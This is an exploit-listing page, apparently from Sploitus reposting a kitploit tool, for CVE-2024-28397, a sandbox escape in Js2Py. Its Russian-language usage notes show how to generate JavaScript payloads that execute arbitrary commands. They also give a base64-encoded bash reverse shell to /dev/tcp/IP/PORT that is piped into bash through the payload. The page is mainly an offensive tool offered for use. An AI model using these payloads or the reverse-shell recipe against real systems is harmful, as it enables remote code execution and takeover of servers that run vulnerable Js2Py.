Sploitus

Exploit for CVE-2024-28397-Js2Py-RCE

kitploit · 2026-08-25

Exploit Code

MARKDOWN39 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-Y0NALDEZ-CVE-2024-28397-JS2PY-RCE
# CVE-2024-28397 - Генератор полезной нагрузки для обхода песочницы Js2Py

Этот скрипт генерирует JavaScript-нагрузку, которая может быть выполнена с помощью Js2Py в уязвимых средах, где внутренние компоненты Python доступны через обёртки объектов.

## Использование

Базовая команда выполнения:

root@kitploit:~
    
    
    python3 cve-2024-28397.py -c "id"
    

Генерация компактной однострочной нагрузки:

root@kitploit:~
    
    
    python3 cve-2024-28397.py -c "whoami" --compact
    

## Обратный шелл с использованием Base64

Сгенерируйте Base64-нагрузку:

root@kitploit:~
    
    
    echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
    

Сгенерируйте полезную нагрузку для Js2Py:

root@kitploit:~
    
    
    python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact